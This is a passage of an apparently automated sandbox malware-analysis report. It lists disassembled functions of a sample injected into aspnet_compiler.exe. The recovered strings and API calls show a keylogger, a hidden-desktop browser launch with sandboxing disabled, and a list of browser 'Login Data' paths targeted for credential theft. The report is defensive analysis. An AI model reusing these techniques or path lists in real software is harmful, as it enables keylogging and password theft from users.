                                                                            • Opcode Fuzzy Hash: 156927e372652f8f96686f521bc17954d918b764854843aced2cc5c601c062f1
                                                                            • Instruction Fuzzy Hash: 5DB00275958200ABDE516BB09E0DB5A7A75AB48702F048454B24985161C67544119B66
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00412514 Relevance: 1.5, APIs: 1, Instructions: 28registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegCreateKeyExW.KERNELBASE(80000001,00000000,00000000,00000000,00000001,00000001,00000000,?,00000000,77C30770,?,?,0041270B,?,?), ref: 00412534
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 5228ff0b190b937b08b73a2a7384eafff423ad1fc8258efa1007a891bcb9c750
                                                                            • Instruction ID: 6b4a3946c2a43bcd037634b81ad519b7cc297f2607030efe808653eea7f4a6e3
                                                                            • Opcode Fuzzy Hash: 5228ff0b190b937b08b73a2a7384eafff423ad1fc8258efa1007a891bcb9c750
                                                                            • Instruction Fuzzy Hash: DCE0D832515325FFDB208B528D48ECB7F7DDB057E4F008115F509D2150D2B18640D5F4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004032E6 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00403319
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrlen$DispatcherEnvironmentExceptionExpandStringsUser
                                                                            • String ID:
                                                                            • API String ID: 1216311190-0
                                                                            • Opcode ID: 6c91cbb0185144303db70d390597fcf272f18e3465f150284448be57c2be313a
                                                                            • Instruction ID: c9e9bc113a16d457794ea73b6dea9160bc4569d11f418ada23e118eebf44067f
                                                                            • Opcode Fuzzy Hash: 6c91cbb0185144303db70d390597fcf272f18e3465f150284448be57c2be313a
                                                                            • Instruction Fuzzy Hash: E9E048B670015967DB30A6169C06FD6776DDBC471CF0400B9B709F21D0E975DA06C6A8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405A23 Relevance: 1.5, APIs: 1, Instructions: 23networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004117B7: CreateMutexA.KERNELBASE(00000000,00000000,00000000,?,004113FD,?,?,00411978,?,77C30770,00000000,00405B72), ref: 004117BF
                                                                            • WSAStartup.WS2_32(00000002,?), ref: 00405A4C
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateMutexStartup
                                                                            • String ID:
                                                                            • API String ID: 3730780901-0
                                                                            • Opcode ID: 8fc4056cf67e8e1589ff72f7a35a52cbe4d60c4a23f4d9fffcf1e601f2432e09
                                                                            • Instruction ID: 2a260520f2afbb8a1e0ca9aeaaef8dbe40d0ee1d54cebc48408a6e1b33bc0553
                                                                            • Opcode Fuzzy Hash: 8fc4056cf67e8e1589ff72f7a35a52cbe4d60c4a23f4d9fffcf1e601f2432e09
                                                                            • Instruction Fuzzy Hash: 8DE03971500B008BC270AF2B9945893FBF8FF907207000A1FE5A682AA0C7B0B1048B54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004112C4 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00403237: lstrcatA.KERNEL32(00000000,77C30770,?,00000000,?,004036D6,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 00403263
                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,?,?), ref: 004112DF
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateEventlstrcat
                                                                            • String ID:
                                                                            • API String ID: 2275612694-0
                                                                            • Opcode ID: 6d37ef84c37783529fc4d2debaab04c5f689fd435ec9aa43ab3e61700c21c811
                                                                            • Instruction ID: 39468192288ec31cf53fa38ac828197baabee26d9983865f2de3b863843106a1
                                                                            • Opcode Fuzzy Hash: 6d37ef84c37783529fc4d2debaab04c5f689fd435ec9aa43ab3e61700c21c811
                                                                            • Instruction Fuzzy Hash: 7CD02E322082017BD700AF91DC02F92BF29EB50760F008036F24882180CBB1A020C790
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004117B7 Relevance: 1.5, APIs: 1, Instructions: 15synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00000000,?,004113FD,?,?,00411978,?,77C30770,00000000,00405B72), ref: 004117BF
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateMutex
                                                                            • String ID:
                                                                            • API String ID: 1964310414-0
                                                                            • Opcode ID: 9b62faa460be2adddf2a4740bf86999dfbec1966c7ca0747a50593f43ad6b7fc
                                                                            • Instruction ID: d1f17f3edcdec86f78565eb2beadc44be2d21716b89def248c0870d2ffc3ae74
                                                                            • Opcode Fuzzy Hash: 9b62faa460be2adddf2a4740bf86999dfbec1966c7ca0747a50593f43ad6b7fc
                                                                            • Instruction Fuzzy Hash: 72D012F15045206FA3249F395C088A775DDDF98730315CF39B4A5C72D4E5308C808760
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00412554 Relevance: 1.5, APIs: 1, Instructions: 9registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegCloseKey.KERNELBASE(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: d1cf315f0c3b828755566f774ab1677f06f540783bee4846a1eb8c5dc7d1a683
                                                                            • Instruction ID: 9d8d642a2df10e52aa6db1d194c77715a7231d9df8bfeebc40ec518d9b126583
                                                                            • Opcode Fuzzy Hash: d1cf315f0c3b828755566f774ab1677f06f540783bee4846a1eb8c5dc7d1a683
                                                                            • Instruction Fuzzy Hash: 13C04C31014221DBD7355F14E4047D57BF5AB05352F25046E90C055164E7B509D0CA48
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00410C3E Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SHCreateDirectoryExW.SHELL32(00000000,?,00000000,0041274C,00000000,?,?,?,?,00000000,77C30770,00000000), ref: 00410C44
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateDirectory
                                                                            • String ID:
                                                                            • API String ID: 4241100979-0
                                                                            • Opcode ID: 9a991b3da34938619209aa850904dd2585657d0af3bfd830ffa1374368b66a4b
                                                                            • Instruction ID: bf7d7d0385146835833033b658300741a11cd90afef40312a0121630c5b8194d
                                                                            • Opcode Fuzzy Hash: 9a991b3da34938619209aa850904dd2585657d0af3bfd830ffa1374368b66a4b
                                                                            • Instruction Fuzzy Hash: 7AB012303E82005BDE101B708C06F103520A712B07F2001B0B112C90E0C66100065504
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00404F74 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00403666: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00404FB1,?), ref: 00403693
                                                                              • Part of subcall function 00403666: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 004036BE
                                                                              • Part of subcall function 0040594B: getaddrinfo.WS2_32(77C30770,00000000,00404FB9,00000000), ref: 00405998
                                                                              • Part of subcall function 0040594B: socket.WS2_32(00000002,00000001,00000000), ref: 004059AF
                                                                              • Part of subcall function 0040594B: htons.WS2_32(00000000), ref: 004059D5
                                                                              • Part of subcall function 0040594B: freeaddrinfo.WS2_32(00000000), ref: 004059E5
                                                                              • Part of subcall function 0040594B: connect.WS2_32(?,?,00000010), ref: 004059F1
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            • Sleep.KERNELBASE(?,?,?,?,?,?,00000000,77C30770,00000000), ref: 00404FE6
                                                                              • Part of subcall function 0040577F: setsockopt.WS2_32(000000FF,0000FFFF,00001006,?,00000004), ref: 004057B6
                                                                              • Part of subcall function 0040577F: recv.WS2_32(000000FF,?,0000000C,00000000), ref: 00405806
                                                                              • Part of subcall function 0040577F: recv.WS2_32(000000FF,?,000000FF,00000000), ref: 00405876
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWiderecv$FreeSleepVirtualconnectfreeaddrinfogetaddrinfohtonssetsockoptsocket
                                                                            • String ID:
                                                                            • API String ID: 3250391716-0
                                                                            • Opcode ID: 89017d7556fb8d56fb1511bb38ea8781eee0bb77f67d971622541f7913f6880a
                                                                            • Instruction ID: 3798276f2d6deacb5579a467cc78981a12bd2d3cc445b7be3850e793cb4ca415
                                                                            • Opcode Fuzzy Hash: 89017d7556fb8d56fb1511bb38ea8781eee0bb77f67d971622541f7913f6880a
                                                                            • Instruction Fuzzy Hash: C4015271A00916BBCB14AB65D949BEEF779FF40319F00052EE41A73281DB786A15CBD4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405F68 Relevance: 1.3, APIs: 1, Instructions: 17memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,004034F4,?,00405B8D,.bss,00000000), ref: 00405F76
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: f1a7ba58f94a8befa6630eb27b5e9bf87aed46268b93f7419a6681cf929e3ed4
                                                                            • Instruction ID: e48ffaa35cf7c95941dea0d5a44f438d870c849a0c4b6b129c3fdc7458d1fa28
                                                                            • Opcode Fuzzy Hash: f1a7ba58f94a8befa6630eb27b5e9bf87aed46268b93f7419a6681cf929e3ed4
                                                                            • Instruction Fuzzy Hash: 58C012223482602AE124111A7C1AF5B9DACCBC1FB1F01002FF6059A2D0D9D00C0181A8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00409733 Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 1263568516-0
                                                                            • Opcode ID: 9bc93bb1a3698aea7ee270b90f1be36fa01f6a0388a93eaf891ae68bb0364329
                                                                            • Instruction ID: d77e01f5aa36a87b39216e07334d8eada759ddd446e76f586daee25b3cfe99bb
                                                                            • Opcode Fuzzy Hash: 9bc93bb1a3698aea7ee270b90f1be36fa01f6a0388a93eaf891ae68bb0364329
                                                                            • Instruction Fuzzy Hash: F8B0923438070157EE2CDB208C55F6A2220BB80B05FA089ACB102AA1D08AB9E4028A08
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405FFA Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00403764,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,77C30770,00000000), ref: 00406004
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 03a753f4e56950697ff4e71072d1805ec65d3fd45af3395555f01cc7733772b7
                                                                            • Instruction ID: d603def4ad70c1049ddec86c054817805532c4fd5811fc6e80ce733ca9b25ee4
                                                                            • Opcode Fuzzy Hash: 03a753f4e56950697ff4e71072d1805ec65d3fd45af3395555f01cc7733772b7
                                                                            • Instruction Fuzzy Hash: 40A002B07D93047EFD6997509D1FF553D68A744F16F604154B3096D0D0A5E02500C52D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405FEB Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 1263568516-0
                                                                            • Opcode ID: 7c6eb06f239127f0dcae98b16747e067cbb9817e51cb8f59be5681c4efa5b6de
                                                                            • Instruction ID: a4afafc7f9fbe744b945ffb19ace319cc8b7579b2679098b8a9567e0cb6a054f
                                                                            • Opcode Fuzzy Hash: 7c6eb06f239127f0dcae98b16747e067cbb9817e51cb8f59be5681c4efa5b6de
                                                                            • Instruction Fuzzy Hash: E6A002706D470066ED7457605D4AF4526247740B51F208A947241A80E08AF5A0458A5C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Function 00413695 Relevance: 84.6, APIs: 28, Strings: 20, Instructions: 624processsynchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateDesktopW.USER32 ref: 004136DC
                                                                              • Part of subcall function 00403373: lstrlenW.KERNEL32(77C30770,00403758,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,77C30770,00000000), ref: 0040337A
                                                                            • AssocQueryStringW.SHLWAPI(00000000,00000002,http,open,?,00000000), ref: 00413722
                                                                            • PathFindFileNameW.SHLWAPI(?,?,?,?,?,?), ref: 0041372F
                                                                            • CreateProcessW.KERNEL32 ref: 004138E4
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?), ref: 004138EB
                                                                            • CreateProcessW.KERNEL32 ref: 00413953
                                                                            • CharLowerW.USER32(00000000,?,?,?,?,?), ref: 00413736
                                                                              • Part of subcall function 00410C8A: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000,?,?,?), ref: 00410CBB
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                              • Part of subcall function 00403447: lstrcatW.KERNEL32(00000000,77C30770), ref: 00403477
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            • PathFindFileNameW.SHLWAPI(00000006,?,?,?,?,?), ref: 00413747
                                                                            • CharLowerW.USER32(00000000,?,?,?,?,?), ref: 0041374E
                                                                            • SHFileOperationW.SHELL32(?,00000000,\AppData\Local\GoogleBackup,?,00000000,\AppData\Local\Google\Chrome\User Data,?,chrome.exe,?,?,?,?,?), ref: 0041381F
                                                                            • CreateDirectoryW.KERNEL32(00000006,00000000,?,?,?,?,?), ref: 00413827
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Create$FilePathlstrlen$CharFindLowerNameProcess$AssocDesktopDirectoryDispatcherExceptionFolderFreeObjectOperationQuerySingleSpecialStringUserVirtualWaitlstrcat
                                                                            • String ID: --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11$ --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir="$-no-remote -profile "$Path$Profile0$\AppData\Local\GoogleBackup$\AppData\Local\Google\Chrome\User Data$\AppData\Roaming\FirefoxBackup$\AppData\Roaming\Mozilla\Firefox\$\prefs.js$\xcopy.exe$chrome.exe$firefox.exe$http$iexplore.exe$open$profiles.ini$user_pref("layers.acceleration.disabled", true);$vnc$xcopy.exe /H /Y /E /C
                                                                            • API String ID: 210209566-2122738177
                                                                            • Opcode ID: 5531be207abcce5aedba1ede6929aa09fda71a645f9ee7d4f35d59399a87cfee
                                                                            • Instruction ID: d1ee3767f8a76cc5fff92834ee7294f166e8d308623be65a05114b919e0f7e15
                                                                            • Opcode Fuzzy Hash: 5531be207abcce5aedba1ede6929aa09fda71a645f9ee7d4f35d59399a87cfee
                                                                            • Instruction Fuzzy Hash: 11226871A00209ABCB15EBA2DC96EEEBB7CAF44709F10407AF502B61D1DF785B45CB58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040813A Relevance: 45.8, APIs: 17, Strings: 9, Instructions: 286keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetAsyncKeyState.USER32(00000010), ref: 00408176
                                                                            • CallNextHookEx.USER32(00000000,?,?,?), ref: 00408577
                                                                              • Part of subcall function 004085CB: GetForegroundWindow.USER32(?,?,?), ref: 004085F4
                                                                              • Part of subcall function 004085CB: GetWindowTextW.USER32 ref: 00408607
                                                                              • Part of subcall function 004085CB: lstrlenW.KERNEL32(-00000210,{Unknown},?,?), ref: 00408670
                                                                              • Part of subcall function 004085CB: CreateFileW.KERNEL32(?,00000004,00000001,00000000,00000004,00000080,00000000,?,?), ref: 004086DE
                                                                              • Part of subcall function 004085CB: lstrlenW.KERNEL32(00417A60,00000008,00000000,?,?), ref: 00408707
                                                                              • Part of subcall function 004085CB: WriteFile.KERNEL32(?,00417A60,00000000,?,?), ref: 00408713
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileWindowlstrlen$AsyncCallCreateForegroundHookNextStateTextWrite
                                                                            • String ID: [ALT]$[BKSP]$[CAPS]$[CTRL]$[DEL]$[ENTER]$[ESC]$[INSERT]$[TAB]
                                                                            • API String ID: 2452648998-4143582258
                                                                            • Opcode ID: 881548f72cfd94900db163d355712600b34b549d501f703e75189cd75d0e76ec
                                                                            • Instruction ID: 005c92b7aa13bd5785e0d60a0273475475fd8f33417f3dbf942b8c71a30de329
                                                                            • Opcode Fuzzy Hash: 881548f72cfd94900db163d355712600b34b549d501f703e75189cd75d0e76ec
                                                                            • Instruction Fuzzy Hash: 0791C132A4C910ABCB1892288F586BA2531A7917A4F10C17FD9C3B77D1DF7C9E82524F
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040B917 Relevance: 35.2, Strings: 28, Instructions: 218COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • \BraveSoftware\Brave-Browser\User Data\Default\Login Data, xrefs: 0040BA7A
                                                                            • \Tencent\QQBrowser\User Data\Local State, xrefs: 0040BA08
                                                                            • \Google\Chrome\User Data\Local State, xrefs: 0040B99B
                                                                            • \Comodo\Dragon\User Data\Local State, xrefs: 0040BAAB
                                                                            • \Epic Privacy Browser\User Data\Local State, xrefs: 0040B9B6
                                                                            • \Opera Software\Opera Stable\Local State, xrefs: 0040BA24
                                                                            • \Comodo\Dragon\User Data\Default\Login Data, xrefs: 0040BAB0
                                                                            • \Google\Chrome\User Data\Default\Login Data, xrefs: 0040B9A0
                                                                            • \Torch\User Data\Local State, xrefs: 0040BAC6
                                                                            • \Torch\User Data\Default\Login Data, xrefs: 0040BACB
                                                                            • \Chromium\User Data\Default\Login Data, xrefs: 0040BA5F
                                                                            • \Microsoft\Edge\User Data\Local State, xrefs: 0040B9D1
                                                                            • \Chromium\User Data\Local State, xrefs: 0040BA5A
                                                                            • \Tencent\QQBrowser\User Data\Default\Login Data, xrefs: 0040BA0D
                                                                            • \Epic Privacy Browser\User Data\Default\Login Data, xrefs: 0040B9BB
                                                                            • \Opera Software\Opera Stable\Login Data, xrefs: 0040BA29
                                                                            • \Slimjet\User Data\Default\Login Data, xrefs: 0040BAE6
                                                                            • \Blisk\User Data\Default\Login Data, xrefs: 0040BA44
                                                                            • \CentBrowser\User Data\Default\Login Data, xrefs: 0040BB01
                                                                            • \UCBrowser\User Data_i18n\Local State, xrefs: 0040B9ED
                                                                            • \BraveSoftware\Brave-Browser\User Data\Local State, xrefs: 0040BA75
                                                                            • \Vivaldi\User Data\Default\Login Data, xrefs: 0040BA95
                                                                            • \Blisk\User Data\Local State, xrefs: 0040BA3F
                                                                            • \CentBrowser\User Data\Local State, xrefs: 0040BAFC
                                                                            • \Vivaldi\User Data\Local State, xrefs: 0040BA8E
                                                                            • \Microsoft\Edge\User Data\Default\Login Data, xrefs: 0040B9D6
                                                                            • \UCBrowser\User Data_i18n\Default\UC Login Data.17, xrefs: 0040B9F2
                                                                            • \Slimjet\User Data\Local State, xrefs: 0040BAE1
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FilePath$lstrcatlstrcpy$BinaryCopyExistsOpenType$CloseCombineEnumFolderInfoPrivateProfileQuerySpecialString
                                                                            • String ID: \Blisk\User Data\Default\Login Data$\Blisk\User Data\Local State$\BraveSoftware\Brave-Browser\User Data\Default\Login Data$\BraveSoftware\Brave-Browser\User Data\Local State$\CentBrowser\User Data\Default\Login Data$\CentBrowser\User Data\Local State$\Chromium\User Data\Default\Login Data$\Chromium\User Data\Local State$\Comodo\Dragon\User Data\Default\Login Data$\Comodo\Dragon\User Data\Local State$\Epic Privacy Browser\User Data\Default\Login Data$\Epic Privacy Browser\User Data\Local State$\Google\Chrome\User Data\Default\Login Data$\Google\Chrome\User Data\Local State$\Microsoft\Edge\User Data\Default\Login Data$\Microsoft\Edge\User Data\Local State$\Opera Software\Opera Stable\Local State$\Opera Software\Opera Stable\Login Data$\Slimjet\User Data\Default\Login Data$\Slimjet\User Data\Local State$\Tencent\QQBrowser\User Data\Default\Login Data$\Tencent\QQBrowser\User Data\Local State$\Torch\User Data\Default\Login Data$\Torch\User Data\Local State$\UCBrowser\User Data_i18n\Default\UC Login Data.17$\UCBrowser\User Data_i18n\Local State$\Vivaldi\User Data\Default\Login Data$\Vivaldi\User Data\Local State
                                                                            • API String ID: 2377953819-4166025770
                                                                            • Opcode ID: cf43f39f02312b997be25eea05491107b407181212fac99ddcb5d465d6c2b3ef
                                                                            • Instruction ID: b504e976bd3a8729c7f51a6cb9f8188f68cbd7fbd8cbaae42897a142990720c6
                                                                            • Opcode Fuzzy Hash: cf43f39f02312b997be25eea05491107b407181212fac99ddcb5d465d6c2b3ef
                                                                            • Instruction Fuzzy Hash: 8C71A730355704ABD224FB62CD62E9A37A9EF89704F10443EF5166B2E1CFB96841CB9D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00408D0F Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 214windowstringregistryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(00000000), ref: 00408D21
                                                                            • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,-00000010), ref: 00408D90
                                                                            • lstrcatW.KERNEL32(-00000010,\Microsoft Vision\), ref: 00408DAA
                                                                            • CreateDirectoryW.KERNEL32(-00000010,00000000), ref: 00408DB6
                                                                            • lstrcpyW.KERNEL32 ref: 00408DF0
                                                                            • lstrcatW.KERNEL32(?,004179E8), ref: 00408E03
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                              • Part of subcall function 00411446: FindFirstFileW.KERNEL32(?,?,?,?), ref: 00411473
                                                                            • GetLocalTime.KERNEL32(?,00000000,ExplorerIdentifier), ref: 00408E86
                                                                            • wsprintfW.USER32 ref: 00408EBD
                                                                            • CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000002,00000080,00000000,00000010,?), ref: 00408EFF
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00408F0F
                                                                            • RegisterClassW.USER32 ref: 00408F2E
                                                                            • CreateWindowExW.USER32 ref: 00408F46
                                                                            • GetMessageA.USER32 ref: 00408F67
                                                                            • TranslateMessage.USER32(?), ref: 00408F79
                                                                            • DispatchMessageA.USER32 ref: 00408F84
                                                                            • GetMessageA.USER32 ref: 00408F94
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
